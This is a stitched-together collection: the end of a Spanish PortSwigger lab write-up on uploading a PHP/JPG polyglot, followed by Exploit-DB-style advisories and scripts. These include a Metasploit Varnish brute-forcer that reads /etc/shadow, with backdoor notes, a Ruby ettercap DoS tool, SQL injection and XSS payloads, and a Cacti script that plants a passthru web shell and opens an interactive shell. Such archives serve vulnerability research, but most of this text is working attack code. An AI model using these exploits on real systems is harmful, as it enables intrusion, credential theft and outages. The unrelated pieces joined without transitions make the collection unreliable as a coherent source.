Con esto entendido, configuramos el burp suite para que intercepte las peticiones:
Una vez tenemos Burp Suite listo junto al proxy, seleccionamos el archivo y lo subimos:
Burp suite interceptará la petición de la subida del archivo:
Para tratar mejor con la petición, la vamos a pasar el repeater y al mismo tiempo le vamos a dar a enviar para analizar la respuesta:
Parece que se ha subido sin problemas. Vamos a ver esta respuesta en el navegador:
Una vez aquí, ya no nos hará mas falta el burp suite, por lo que vamos a desactivar el proxy:
Con esto hecho, nos dirigimos a nuestro perfil:
Ahora, si nos fijamos en el perfil, podemos ver como el avatar ha cambiado, y ahora muestra un fallo de que no carga bien la imagen:
Esto seguramente es porque está intentando cargar nuestro archivo PHP como si fuera una imagen, y claro, falla al hacerlo. Para confirmar si se trata de nuestro archivo PHP, le damos click derecho para ir a la ruta exacta de “la imagen”:
Como vemos efectivamente se trata de nuestro archivo PHP, y, además del string colocado para establecer los magic numbers, podemos ver el contenido del archivo secret. Dicho de otra forma, la salida del código PHP interpretado.
Teniendo el contenido de secret, simplemente enviamos la respuesta:
Y de esta forma, resolvemos el laboratorio:
Además de la solución que hemos llevado a cabo, PortSwigger sugiere otra bastante curiosa y que vale la pena comentar:
- Creamos un archivo exploit.php el cual lea el contenido del archivo secret de Carlos, por ejemplo:
<?php echo file_get_contents('/home/carlos/secret'); ?> - Nos logueamos e intentamos subir nuestro archivo PHP en la parte de nuestro avatar. Como veremos, el servidor bloquea cualquier subida de archivo que no se trate de una imagen.
- Vamos a crear un archivo polyglot PHP/JPG. Es decir, un archivo que sea una imagen pero contenga código PHP en sus metadatos. Para ello, es tan sencillo como usar cualquier imagen y agregarle unos metadatos personalizados usando exiftool. Ejemplo:
exiftool -Comment="<?php echo 'START ' . file_get_contents('/home/carlos/secret') . ' END'; ?>" <YOUR-INPUT-IMAGE>.jpg -o polyglot.php. Esto añadirá el payload PHP al campo de comentario de los metadatos. Con esto, guardaremos la imagen con extensión .php. - Ahora, subimos este archivo, veremos que no tendremos ningún problema. Con esto hecho, volvemos a nuestro perfil.
- Si nos vamos al HTTP History del burp suite, podremos ver una petición GET a la supuesta imagen del avatar (esta petición se ha producido cuando hemos accedido a nuestro perfil y el avatar ha intentado cargar). Si cogemos esta petición y miramos su respuesta, podremos ver el contenido del archivo
secretde Carlos. - Enviamos la solución y habremos resuelto el laboratorio.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
INDEPENDENT SECURITY RESEARCHER
PENETRATION TESTING SECURITY
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# Exploit Title: Piwigo 2.7.2 - SQL Injection / Cross Site Scripting Vulnerability's
# Date: 19/12/2014
# Url Vendor: http://www.piwigo.org/
# Vendor Name: Piwigo
# Version: 2.7.2
# CVE: CVE-2014-1470
# CVE References: CVE-2013-1468, CVE-2013-1469
# Author: TaurusOmar
# Tiwtter: @TaurusOmar_
# Email: taurusomar13@gmail.com
# Home: overhat.blogspot.com
# Tested On: Bugtraq Optimus
# Risk: High
Description
Piwigo is a photo gallery software for the web that comes with powerful features to publish and manage your collection of pictures.
------------------------
+ CROSS SITE SCRIPTING +
------------------------
# Exploiting Description - Get into code xss in the box of group list.
<fieldset>
<legend>Add Group</legend><p>
<strong>Name Group</strong><br>
YOUR GROUP NAME O POC
<input type="text" size="20" maxlength="50" name="groupname"></p>
<p class="actionButtons">
<input type="submit" value="Add" name="submit_add" class="submit">
<a id="addGroupClose" href="#">Cancel</a></p>
<input type="hidden" value="24322c55681c00da423a8a7b21b79640" name="pwg_token">
</fieldset>
#P0c
"><img src=x onerror=prompt(1);>
#Proof Concept
http://i.imgur.com/qFyJz6q.jpg
------------------------
+ Sql Injection +
------------------------
# Exploiting Description - Sql Injection in control panel of admin and others users .
#P0c
http://site.com/piwigo/admin.php?page=history&search_id=5'
SELECT
date,
time,
user_id,
IP,
section,
category_id,
tag_ids,
image_id,
image_type
FROM ucea_history
WHERE
; in /home/site.com/public_html/piwigo/include/dblayer/functions_mysqli.inc.php on line 830
#Proof Concept
http://i.imgur.com/wpzMmmu.jpg
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
INDEPENDENT SECURITY RESEARCHER
PENETRATION TESTING SECURITY
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# Exploit Title: ProjectSend r561 - Cross Site Scripting & Full Path Disclosure Vulnerability's
# Date: 19/12/2014
# Url Vendor: http://www.projectsend.org/
# Vendor Name: ProjectSend
# Version: r561 Ultimate Version
# CVE: CVE-2014-1155
# Author: TaurusOmar
# Tiwtte: @TaurusOmar_
# Email: taurusomar13@gmail.com
# Home: overhat.blogspot.com
# Tested On: Bugtraq Optimus
# Risk: Medium
Description
ProjectSend is a client-oriented file uploading utility. Clients are created and assigned a username and a password. Files can then be uploaded under each account with the ability to add a title and description to each.When a client logs in from any browser anywhere, the client will see a page that contains your company logo, and a sortable list of every file uploaded under the client's name, with description, time, date, etc.. It also works as a history of "sent" files, provides a differences between revisions, the time that it took between each revision, and so on.
------------------------
+ CROSS SITE SCRIPTING +
------------------------
# Exploiting Description - Get into code xss in the box of image description.
<textarea placeholder="Optionally, enter here a description for the file." name="file[1][description]">DESCRIPTION</textarea>
#P0c
"><img src=x onerror=;;alert('XSS') />
<textarea placeholder="Optionally, enter here a description for the file." name="file[1][description]">CODE XSS</textarea>
#Proof Concept
http://i.imgur.com/FOPIvd4.jpg
------------------------
+ FULL PATH DISCLOSURE +
------------------------
# Exploiting Description - The url disclosure directory of platform.
#P0c
http://site.com/projectsend/templates/pinboxes/template.php
#Proof Concept
http://i.imgur.com/xfN4kDV.jpg
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Report
include Msf::Auxiliary::AuthBrute
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'Varnish Cache CLI Interface Bruteforce Utility',
'Description' => 'This module attempts to login to the Varnish Cache (varnishd) CLI instance using a bruteforce
list of passwords. This module will also attempt to read the /etc/shadow root password hash
if a valid password is found. It is possible to execute code as root with a valid password,
however this is not yet implemented in this module.',
'References' =>
[
[ 'OSVDB', '67670' ],
[ 'CVE', '2009-2936' ],
# General
[ 'URL', 'https://www.varnish-cache.org/trac/wiki/CLI' ],
[ 'CVE', '1999-0502'] # Weak password
],
'Author' => [ 'patrick' ],
'License' => MSF_LICENSE
)
register_options(
[
Opt::RPORT(6082),
OptPath.new('PASS_FILE', [ false, "File containing passwords, one per line",
File.join(Msf::Config.data_directory, "wordlists", "unix_passwords.txt") ]),
], self.class)
deregister_options('USERNAME', 'USER_FILE', 'USERPASS_FILE', 'USER_AS_PASS', 'DB_ALL_CREDS', 'DB_ALL_USERS')
end
def run_host(ip)
connect
res = sock.get_once(-1,3) # detect banner
if (res =~ /107 \d+\s\s\s\s\s\s\n(\w+)\n\nAuthentication required./) # 107 auth
vprint_status("Varnishd CLI detected - authentication required.")
each_user_pass { |user, pass|
sock.put("auth #{Rex::Text.rand_text_alphanumeric(3)}\n") # Cause a login fail.
res = sock.get_once(-1,3) # grab challenge
if (res =~ /107 \d+\s\s\s\s\s\s\n(\w+)\n\nAuthentication required./) # 107 auth
challenge = $1
secret = pass + "\n" # newline is needed
response = challenge + "\n" + secret + challenge + "\n"
response = Digest::SHA256.hexdigest(response)
sock.put("auth #{response}\n")
res = sock.get_once(-1,3)
if (res =~ /107 \d+/) # 107 auth
vprint_status("FAILED: #{secret}")
elsif (res =~ /200 \d+/) # 200 ok
print_good("GOOD: #{secret}")
report_auth_info(
:host => rhost,
:port => rport,
:sname => ('varnishd'),
:pass => pass,
:proof => "#{res}",
:source_type => "user_supplied",
:active => true
)
sock.put("vcl.load #{Rex::Text.rand_text_alphanumeric(3)} /etc/shadow\n") # only returns 1 line of any target file.
res = sock.get_once(-1,3)
if (res =~ /root:([\D\S]+):/) # lazy.
if ($1[0] == "!")
vprint_error("/etc/shadow root uid is disabled.\n")
else
print_good("/etc/shadow root enabled:\nroot:#{$1}:")
end
else
vprint_error("Unable to read /etc/shadow?:\n#{res}\n")
end
break
else
vprint_error("Unknown response:\n#{res}\n")
end
end
}
elsif (res =~ /Varnish Cache CLI 1.0/)
print_good("Varnishd CLI does not require authentication!")
else
vprint_error("Unknown response:\n#{res}\n")
end
disconnect
end
end
=begin
aushack notes:
- varnishd typically runs as root, forked as unpriv.
- 'param.show' lists configurable options.
- 'cli_timeout' is 60 seconds. param.set cli_timeout 99999 (?) if we want to inject payload into a client thread and avoid being killed.
- 'user' is nobody. param.set user root (may have to stop/start the child to activate)
- 'group' is nogroup. param.set group root (may have to stop/start the child to activate)
- (unless varnishd is launched with -r user,group (read-only) implemented in v4, which may make priv esc fail).
- vcc_unsafe_path is on. used to 'import ../../../../file' etc.
- vcc_allow_inline_c is off. param.set vcc_allow_inline_c on to enable code execution.
- code execution notes:
* quotes must be escaped \"
* \n is a newline
* C{ }C denotes raw C code.
* e.g. C{ unsigned char shellcode[] = \"\xcc\"; }C
* #import <stdio.h> etc must be "newline", i.e. C{ \n#include <stdlib.h>\n dosomething(); }C (without 2x \n, include statement will not interpret correctly).
* C{ asm(\"int3\"); }C can be used for inline assembly / shellcode.
* varnishd has it's own 'vcl' syntax. can't seem to inject C randomly - must fit VCL logic.
* example trigger for backdoor:
VCL server:
vcl.inline foo "vcl 4.0;\nbackend b { . host = \"127.0.0.1\"; } sub vcl_recv { if (req.url ~ \"^/backd00r\") { C{ asm(\"int3\"); }C } } \n"
vcl.use foo
start
Attacker:
telnet target 80
GET /backd00r HTTP/1.1
Host: 127.0.0.1
(... wait for child to execute debug trap INT3 / shellcode).
CLI protocol notes from website:
The CLI protocol used on the management/telnet interface is a strict request/response protocol, there are no unsolicited transmissions from the responding end.
Requests are whitespace separated tokens terminated by a newline (NL) character.
Tokens can be quoted with "..." and common backslash escape forms are accepted: (\n), (\r), (\t), (
), (\"), (\%03o) and (\x%02x)
The response consists of a header which can be read as fixed format or ASCII text:
1-3 %03d Response code
4 ' ' Space
5-12 %8d Length of body
13 \n NL character.
Followed by the number of bytes announced by the header.
The Responsecode is numeric shorthand for the nature of the reaction, with the following values currently defined in include/cli.h:
enum cli_status_e {
CLIS_SYNTAX = 100,
CLIS_UNKNOWN = 101,
CLIS_UNIMPL = 102,
CLIS_TOOFEW = 104,
CLIS_TOOMANY = 105,
CLIS_PARAM = 106,
CLIS_OK = 200,
CLIS_CANT = 300,
CLIS_COMMS = 400,
CLIS_CLOSE = 500
};
=end
#Exploit Title: 6 Remote ettercap Dos exploits to 1
#Date: 19/12/2014
#Exploit Author: Nick Sampanis
#Vendor Homepage: http://ettercap.github.io
#Software Link: https://github.com/Ettercap/ettercap/archive/v0.8.1.tar.gz
#Version: 8.0-8.1
#Tested on: Linux
#CVE: CVE-2014-6395 CVE-2014-9376 CVE-2014-9377 CVE-2014-9378 CVE-2014-9379
#Make sure that you have installed packefu and pcaprub
require 'packetfu'
include PacketFu
if ARGV.count < 4
puts "[-]Usage #{$PROGRAM_NAME} src_ip dst_ip src_mac iface"
puts "[-]Use valid mac for your interface, if you dont know"+
" victim's ip address use broadcast"
exit
end
def nbns_header
u = UDPPacket.new()
u.eth_saddr = ARGV[2]
u.eth_daddr = "ff:ff:ff:ff:ff:ff"
u.ip_daddr = ARGV[1]
u.ip_saddr = ARGV[0]
u.udp_src = 4444
u.udp_dst = 137
u.payload = "\xa0\x2c\x01\x10\x00\x01\x00\x00\x00\x00\x00\x00"
u.payload << "\x20\x46\x48\x45\x50\x46\x43\x45\x4c\x45\x48\x46"#name
u.payload << "\x43\x45\x50\x46\x46\x46\x41\x43\x41\x43\x41\x43"#name
u.payload << "\x41\x43\x41\x43\x41\x43\x41\x41\x41\x00"#name
u.payload << "\x00\x20" #type
u.payload << "\x00\x01" #class
u.payload << "A"*1000 #pad
u.recalc
u.to_w(ARGV[3])
end
def gg_client
u = TCPPacket.new()
u.eth_saddr = ARGV[2]
u.eth_daddr = "ff:ff:ff:ff:ff:ff"
u.ip_saddr = ARGV[0]
u.ip_daddr = ARGV[1]
u.tcp_src = 3333
u.tcp_dst = 8074
u.payload = "\x15\x00\x00\x00" #gg_type
u.payload << "\xe8\x03\x00\x00" #gg_len
u.payload << "A"*1000
u.recalc
u.to_w(ARGV[3])
end
def dhcp_header
u = UDPPacket.new()
u.eth_saddr = ARGV[2]
u.eth_daddr = "ff:ff:ff:ff:ff:ff"
u.ip_daddr = ARGV[0]
u.ip_saddr = ARGV[1]
u.udp_src = 67
u.udp_dst = 4444
u.payload = "\x02"*236
u.payload << "\x63\x82\x53\x63"
u.payload << "\x35"
u.payload << "\x00\x05\x00"
u.payload << "\x51"
u.payload << "\x00" #size
u.payload << "A" * 3 #pad
u.recalc
u.to_w(ARGV[3])
end
def mdns_header
u = UDPPacket.new()
u.eth_saddr = ARGV[2]
u.eth_daddr = "ff:ff:ff:ff:ff:ff"
u.ip_daddr = ARGV[1]
u.ip_saddr = ARGV[0]
u.udp_src = 4444
u.udp_dst = 5353
u.payload = "\x11\x11" #id
u.payload << "\x00\x00" #flags
u.payload << "\x00\x01" #questions
u.payload << "\x00\x00" #answer_rr
u.payload << "\x00\x00" #auth_rrs
u.payload << "\x00\x00" #additional_rr
u.payload << "\x06router\x05local\x00" #name
u.payload << "\x00\x01" #type
u.payload << "\x00\x01" #class
u.recalc
u.to_w(ARGV[3])
end
def mdns_dos_header
u = UDPPacket.new()
u.eth_saddr = ARGV[2]
u.eth_daddr = "ff:ff:ff:ff:ff:ff"
u.ip_daddr = ARGV[1]
u.ip_saddr = ARGV[0]
u.udp_src = 4444
u.udp_dst = 5353
u.payload = "\x11\x11" #id
u.payload << "\x00\x00" #flags
u.payload << "\x00\x01" #questions
u.payload << "\x00\x00" #answer_rr
u.payload << "\x00\x00" #auth_rrs
u.payload << "\x00\x00" #additional_rr
u.payload << "\x01"
u.payload << "\x00\x01" #type
u.payload << "\x00\x01" #class
u.payload << "A"*500
u.recalc
u.to_w(ARGV[3])
end
def pgsql_server
u = TCPPacket.new()
u.eth_saddr = ARGV[2]
u.eth_daddr = "ff:ff:ff:ff:ff:ff"
u.ip_saddr = ARGV[1]
u.ip_daddr = ARGV[0]
u.tcp_src = 5432
u.tcp_dst = 3333
u.payload = "\x52\x00\x00\x00\x08\x00\x00\x00\x03\x73\x65\x72\x02\x74\x65\x73\x74\x00\x64\x61\x74\x61\x62\x61\x73\x65\x02\x74\x65\x73\x74\x00\x63\x6c\x69\x65\x6e\x74\x5f\x65\x6e\x63\x6f\x64\x69\x6e\x67\x00\x55\x4e\x49\x43\x4f\x44\x45\x00\x44\x61\x74\x65\x53\x74\x79\x6c\x65\x00\x49\x53\x4f\x00\x54\x69\x6d\x65\x5a\x6f\x6e\x65\x00\x55\x53\x2f\x50\x61\x63\x69\x66\x69\x63\x00\x00"
u.recalc
u.to_w(ARGV[3])
end
def pgsql_client
u = TCPPacket.new()
u.eth_saddr = ARGV[2]
u.eth_daddr = "ff:ff:ff:ff:ff:ff"
u.ip_saddr = ARGV[0]
u.ip_daddr = ARGV[1]
u.tcp_src = 3333
u.tcp_dst = 5432
u.payload = "\x70\x00\x00\x5b\x00\x03\x00\x00\x75\x73\x65\x72\x02\x74\x65\x73\x74\x00\x64\x61\x74\x61\x62\x61\x73\x65\x02\x74\x65\x73\x74\x00\x63\x6c\x69\x65\x6e\x74\x5f\x65\x6e\x63\x6f\x64\x69\x6e\x67\x00\x55\x4e\x49\x43\x4f\x44\x45\x00\x44\x61\x74\x65\x53\x74\x79\x6c\x65\x00\x49\x53\x4f\x00\x54\x69\x6d\x65\x5a\x6f\x6e\x65\x00\x55\x53\x2f\x50\x61\x63\x69\x66\x69\x63\x00\x00"
u.recalc
u.to_w(ARGV[3])
end
def pgsql_client_shell
u = TCPPacket.new()
u.eth_saddr = ARGV[2]
u.eth_daddr = "ff:ff:ff:ff:ff:ff"
u.ip_saddr = ARGV[0]
u.ip_daddr = ARGV[1]
u.tcp_src = 3333
u.tcp_dst = 5432
u.payload = "\x70"
u.payload << "\x00\x00\x03\xe9" #len
u.payload << "A"*1000
u.payload << "\x00"
u.recalc
u.to_w(ARGV[3])
end
def radius_header
u = UDPPacket.new()
u.eth_saddr = ARGV[2]
u.eth_daddr = "ff:ff:ff:ff:ff:ff"
u.ip_daddr = ARGV[1]
u.ip_saddr = ARGV[0]
u.udp_src = 4444
u.udp_dst = 1645
u.payload = "\x01\x01\x00\xff\x00\x01\x00\x00\x00\x00\x00\x00\x20\x46\x48\x00\x50\x46\x43\xff\x01\x00\x48\x46\x01\x00\x50\x46\x46\x46\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x41\x41\x00\x00\x20\x00\x01"
u.recalc
u.to_w(ARGV[3])
end
puts "[+]6 Remote ettercap Dos exploits to 1 by Nick Sampanis"
puts "[+]-1- nbns plugin CVE-2014-9377"
puts "[+]-2- gg dissector CVE-2014-9376"
puts "[+]-3- dhcp dissector CVE-2014-9376"
puts "[+]-4- mdns plugin CVE-2014-9378"
puts "[+]-5- postgresql dissector CVE-2014-6395(works only in 8.0)"
puts "[+]-6- radius dissector CVE-2014-9379"
print "choice:"
choice = $stdin.gets.chomp().to_i()
case choice
when 1
puts "[+]Sending nbns packet.."
nbns_header
when 2
puts "[+]Sending client gg packet.."
gg_client
when 3
puts "[+]Sending dhcp packet.."
dhcp_header
when 4
puts "[+]Sending mdns packet.."
mdns_header
mdns_dos_header
when 5
puts "[+]Sending pgsql packet.."
pgsql_client
pgsql_server
pgsql_client_shell
when 6
puts "[+]Sending radius packet.."
radius_header
else
puts "[-]Unrecognized command "
end
# Exploit Title: miniBB 3.1 Blind SQL Injection
# Date: 23-11-2014
# Software Link: http://www.minibb.com/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# CVE: CVE-2014-9254
# Category: webapps
1. Description
preg_match() only check if $_GET['code'] contains at least one letter or digit (missing ^ and $ inside regexp).
File: bb_func_unsub.php
$usrid=(isset($_GET['usrid'])?$_GET['usrid']+0:0);
$allowUnsub=FALSE;
$chkCode=FALSE;
if(isset($_GET['code']) and preg_match("#[a-zA-Z0-9]+#", $_GET['code'])){
//trying to unsubscribe directly from email
$chkField='email_code';
$chkVal=$_GET['code'];
$userCondition=TRUE;
$chkCode=TRUE;
}
else{
//manual unsubsribe
$chkField='user_id';
$chkVal=$user_id;
$userCondition=($usrid==$user_id);
}
if ($topic!=0 and $usrid>0 and $userCondition and $ids=db_simpleSelect(0, $Ts, 'id, user_id', 'topic_id', '=', $topic, '', '', $chkField, '=', $chkVal))
http://security.szurek.pl/minibb-31-blind-sql-injection.html
2. Proof of Concept
http://minibb-url/index.php?action=unsubscribe&usrid=1&topic=1&code=test' UNION SELECT 1, IF(substr(user_password,1,1) = CHAR(99), SLEEP(5), 0) FROM minibbtable_users WHERE user_id = 1 AND username != '
This SQL will check if first password character user ID=1 is c.
If yes, it will sleep 5 seconds.
3. Solution:
http://www.minibb.com/forums/news-9/blind-sql-injection-fix-6430.html
source: https://www.securityfocus.com/bid/47267/info
vtiger CRM is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
vtiger CRM 5.2.1 is vulnerable; other versions may also be affected.
http://www.example.com/vtigercrm/vtigerservice.php?service=%3Cscript%3Ealert%280%29%3C/script%3E
#!/bin/sh
##############
# Exploit Title: Cacti - Superlinks Plugin 1.4-2 RCE(LFI) via SQL Injection
# Date: 19/12/2014
# Exploit Author: Wireghoul
# Software Link: http://docs.cacti.net/plugin:superlinks
# Identifiers: CVE-2014-4644, EDB-ID-33809
# Exploit explanation through inline comments
# Patch provided at the end
#
# This is the year where hope fails you -- Slipknot: Pulse of the maggots
#
##############
echo -e "\e[32m *-*, \e[31m ___________"
echo -e "\e[32m ,*\/|\`| ; \e[31m /.'_______\`.\\"
echo -e "\e[32m \\' | |'; *, \e[31m /( (_______\`-'\\"
echo -e "\e[32m \ \`| | ;/ ) \e[31m \`.\`.______ \.'"
echo -e "\e[32m : |'| , / \e[31m \`..-.___>.'"
echo -e "\e[32m :'| |, / \e[31m \`.__ .'\e[0m"
echo -e " _________\e[32m:_|_|_;\e[0m_______________\e[31m\`.'\e[0m_______[Wireghoul]___"
echo -e " CACTI SUPERLINKS PLUGIN 1.4-2 REMOTE CODE EXECUTION PoC"
echo
if [ -z $1 ]; then
echo -e "Usage $0 <superpluginurl>\n $0 http://example.com/cacti/plugins/superlinks/superlinks.php\n";
exit 2;
fi
# This exploit is a second order LFI through SQLI, so first we must write some data to disk
# Luckily the application logs all sort of stuff, so lets poison the application log
# The reason for this is manyfold, read on.
curl --silent "$1?id=SHELL<?php+passthru(\$_GET\[c\])+?>LLEHS<?php+exit+?>" > /dev/null
# Now lets analyse the vulnerability:
# superlinks.php:21:if (isset($_GET['id'])) {
# superlinks.php:22: $pageid=$_GET['id'];
# superlinks.php:23:}
# superlinks.php:24:
# superlinks.php:25:$page = db_fetch_row("SELECT DISTINCT
# superlinks.php:26: id,
# superlinks.php:27: title,
# superlinks.php:28: style,
# superlinks.php:29: contentfile
# superlinks.php:30: FROM (superlinks_pages, superlinks_auth)
# superlinks.php:31: WHERE superlinks_pages.id=superlinks_auth.pageid
# superlinks.php:32: AND id=" . $pageid . "
# This is where the injection occurs, we can now union select 1,2,3,4 -- ftw
# However the real fun occurs a few lines later
# superlinks.php:57: $my_file = $config["base_path"] . "/plugins/superlinks/content/" . $page['contentfile'];
# superlinks.php:58:
# superlinks.php:59: if (file_exists($my_file)) {
# superlinks.php:60: @include_once($my_file);
# We can now include a file of our choosing (LFI) based on the data returned from the SQLi
# There are only a few problems:
# * We cannot use strings/quotes as magic quotes are usually on
# * We do not know the local path for the LFI
# * Usual tricks like /proc/self* have been patched
# * Database server and web server may be different hosts
# Lets solve the easy one first, we dont need to quote our strings, hex encoding works great
# The second one is a little trickier, we can brute force LFI locations... or
# We can dynamically locate a file path which is stored in the database and present on the webserver
# $ mysqldump cacti | grep '\.log'
# INSERT INTO `settings` VALUES ('path_php_binary','/usr/bin/php'),('path_rrdtool','/usr/bin/rrdtool'),('poller_lastrun','1414565401'),('path_webroot','/usr/share/cacti/site'),('date','2014-10-29 17:50:02'),('stats_poller','Time:0.1182 Method:cmd.php Processes:1 Threads:N/A Hosts:2 HostsPerProcess:2 DataSources:0 RRDsProcessed:0'),('stats_recache','RecacheTime:0.0 HostsRecached:0'),('path_snmpwalk','/usr/bin/snmpwalk'),('path_snmpget','/usr/bin/snmpget'),('path_snmpbulkwalk','/usr/bin/snmpbulkwalk'),('path_snmpgetnext','/usr/bin/snmpgetnext'),('path_cactilog','/var/log/cacti/cacti.log'),('snmp_version','net-snmp'),('rrdtool_version','rrd-1.4.x'),('superlinks_tabstyle','0'),('superlinks_hidelogo','0'),('superlinks_hideconsole','0'),('superlinks_db_version','1.4'),('auth_method','1'),('guest_user','guest'),('user_template','0'),('ldap_server',''),('ldap_port','389'),('ldap_port_ssl','636'),('ldap_version','3'),('ldap_encryption','0'),('ldap_referrals','0'),('ldap_mode','0'),('ldap_dn',''),('ldap_group_require',''),('ldap_group_dn',''),('ldap_group_attrib',''),('ldap_group_member_type','1'),('ldap_search_base',''),('ldap_search_filter',''),('ldap_specific_dn',''),('ldap_specific_password','');
# $ ls -la /var/log/cacti/cacti.log
# -rw-r----- 1 www-data www-data 5838 Oct 29 17:50 /var/log/cacti/cacti.log
# $ tail /var/log/cacti/cati.log
# <snip> ERROR: SQL Assoc Failed!, Error:'1064', SQL:"SELECT graph_templates.id, graph_templates.name FROM (graph_local,graph_templates,graph_templates_graph) WHERE graph_local.id=graph_templates_graph.local_graph_id AND graph_templates_graph.graph_template_id=graph_templates.id AND graph_local.host_id=1 AND graph_templates.id=12 select 1,2,3,4 -- GROUP BY graph_templates.id ORDER BY graph_templates.name"
# WINRAR!
# We can now include the poisoned log file by fetching the log path from the database
# and prepending it with the normal directory traversal pattern ../../../ using concat()
# We traverse 8 deep, that's usually enough
echo -ne "Dropping into shell, type exit to quit.\ncactishell> "
while read line; do
if [ "$line" == "exit" ]; then
exit
fi
comand=`echo -n $line | sed -e's/ /+/g'`
curl --silent "$1?id=123+union+select+1,2,3,concat(0x2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f,value)+from+settings+where+name=0x706174685f63616374696c6f67+--+-&c=$comand" | \
sed -n '/SHELL/, $p' | \
sed -e 's/.*SHELL//' |\
sed '/LLEHS/, $d'
echo -n "cactishell> "
done
# Proposed patch
# Vendor has a patch in a SVN repo somewhere:
# http://bugs.cacti.net/bug_view_advanced_page.php?bug_id=2475
# Yet has not made the patch available, or responded to requests to do so:
# http://forums.cacti.net/viewtopic.php?t=53711
#--- superlinks.php 2014-12-18 02:05:37.706013833 -0500
#+++ superlinks.php 2014-12-18 02:05:09.694014497 -0500
#@@ -19,7 +19,7 @@
#
# $pageid = 0;
# if (isset($_GET['id'])) {
#- $pageid=intval($_GET['id']);
#+ $pageid=$_GET['id'];
# }
#
# $page = db_fetch_row("SELECT DISTINCT
source: https://www.securityfocus.com/bid/47264/info
PrestaShop is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input.
Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
PrestaShop 1.3.6 and prior are vulnerable; other versions may also be affected.
http://www.example.com/[path]/cms.php?rewrited_url=http://[Shell-Path]
source: https://www.securityfocus.com/bid/47266/info
Omer Portal is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Omer Portal 3.220060425 is vulnerable; other versions may also be affected.
http://www.example.com/arama_islem.asp?aramadeger=<script>alert(1)</script>
source: https://www.securityfocus.com/bid/47263/info
vtiger CRM is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible.
vtiger CRM 5.2.1 is vulnerable; other versions may also be affected.
http://www.example.com/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00
source: https://www.securityfocus.com/bid/47245/info
Microsoft Excel is prone to a buffer-overflow vulnerability.
Attackers can exploit this issue by enticing an unsuspecting user to open a specially crafted Excel file.
Successful exploits can allow attackers to execute arbitrary code with the privileges of the user running the application. Failed exploit attempts will result in a denial-of-service condition.
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35573.zip
source: https://www.securityfocus.com/bid/47193/info
Redmine is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Redmine 1.0.1 and 1.1.1 are vulnerable; other versions may also be affected.
http://example.com/projects/hg-helloworld/news/[xss]
source: https://www.securityfocus.com/bid/47182/info
TextPattern is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
TextPattern 4.2.0 is vulnerable; other versions may also be affected.
http://www.example.com/index.php?q=<script>alert(888)</script>